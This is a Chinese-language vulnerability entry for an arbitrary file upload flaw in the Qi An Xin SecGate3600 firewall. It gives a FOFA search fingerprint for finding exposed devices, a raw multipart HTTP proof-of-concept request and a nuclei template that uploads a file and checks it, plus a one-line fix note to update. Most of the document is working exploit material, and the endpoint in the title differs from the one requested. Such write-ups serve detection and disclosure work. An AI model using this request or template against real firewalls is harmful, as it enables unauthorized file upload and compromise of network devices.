1.漏洞介绍
奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传漏洞
2.漏洞编号
CVE | CNVD | CNNVD |
---|---|---|
- | - | - |
3.影响范围
名称 | 版本号 |
---|---|
- |
4.检索特征
FOFA:fid=“1Lh1LHi6yfkhiO83I59AYg==”
5.POC
POST /?g=app_av_import_save HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 515
Content-Type: multipart/form-data; boundary=----peormgefskbofgfgrcvaivswdc
Accept-Encoding: gzip, deflate
------peormgefskbofgfgrcvaivswdc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------peormgefskbofgfgrcvaivswdc
Content-Disposition: form-data; name="upfile"; filename="npwnox.txt"
Content-Type: text/plain
djbheqvmmyguhksmioge
------peormgefskbofgfgrcvaivswdc
Content-Disposition: form-data; name="submit_post"
obj_app_upfile
------peormgefskbofgfgrcvaivswdc
Content-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445
------peormgefskbofgfgrcvaivswdc--
https://127.0.0.1/attachements/npwnox.txt
nuclei检测
id: qianxin-secworld-secgate3600-obj_area_import_save-fileupload
info:
name: 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传漏洞
author: fgz
severity: critical
description: 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传漏洞
metadata:
max-request: 1
fofa-query: fid="1Lh1LHi6yfkhiO83I59AYg=="
verified: true
variables:
file_name: "{{to_lower(rand_text_alpha(6))}}"
file_content: "{{to_lower(rand_text_alpha(20))}}"
rboundary: "{{to_lower(rand_text_alpha(26))}}"
requests:
- raw:
- |+
POST /?g=app_av_import_save HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----{{rboundary}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
------{{rboundary}}
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------{{rboundary}}
Content-Disposition: form-data; name="upfile"; filename="{{file_name}}.txt"
Content-Type: text/plain
{{file_content}}
------{{rboundary}}
Content-Disposition: form-data; name="submit_post"
obj_app_upfile
------{{rboundary}}
Content-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445
------{{rboundary}}--
- |
GET /attachements/{{file_name}}.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
matchers:
- type: dsl
dsl:
- "status_code_1 == 302 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"
6.修复建议
更新到最新版本